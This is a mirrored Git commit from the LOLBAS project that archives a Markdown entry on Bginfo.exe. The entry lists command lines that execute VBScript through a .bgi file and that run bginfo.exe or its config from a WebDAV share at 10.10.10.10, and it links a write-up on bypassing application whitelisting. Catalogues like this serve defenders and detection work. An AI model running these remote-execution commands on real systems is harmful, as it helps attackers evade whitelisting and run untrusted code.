mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2025-07-29 05:31:53 +02:00
Removed MD files, we only use the webportal from now on. All MD files moved to archive
This commit is contained in:
22
Archive-Old-Version/OtherMSBinaries/Bginfo.exe.md
Normal file
22
Archive-Old-Version/OtherMSBinaries/Bginfo.exe.md
Normal file
@@ -0,0 +1,22 @@
|
||||
## Bginfo.exe
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
bginfo.exe bginfo.bgi /popup /nolicprompt
|
||||
Execute VBscript code that is referenced within the bginfo.bgi file.
|
||||
|
||||
"\\10.10.10.10\webdav\bginfo.exe" bginfo.bgi /popup /nolicprompt
|
||||
Execute bginfo.exe from a WebDAV server.
|
||||
|
||||
"\\live.sysinternals.com\Tools\bginfo.exe" \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt
|
||||
This style of execution may not longer work due to patch.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/
|
||||
|
||||
* Full path:
|
||||
* No fixed path
|
||||
|
||||
* Notes: Thanks to Oddvar Moe - @oddvarmoe
|
||||
|
Reference in New Issue
Block a user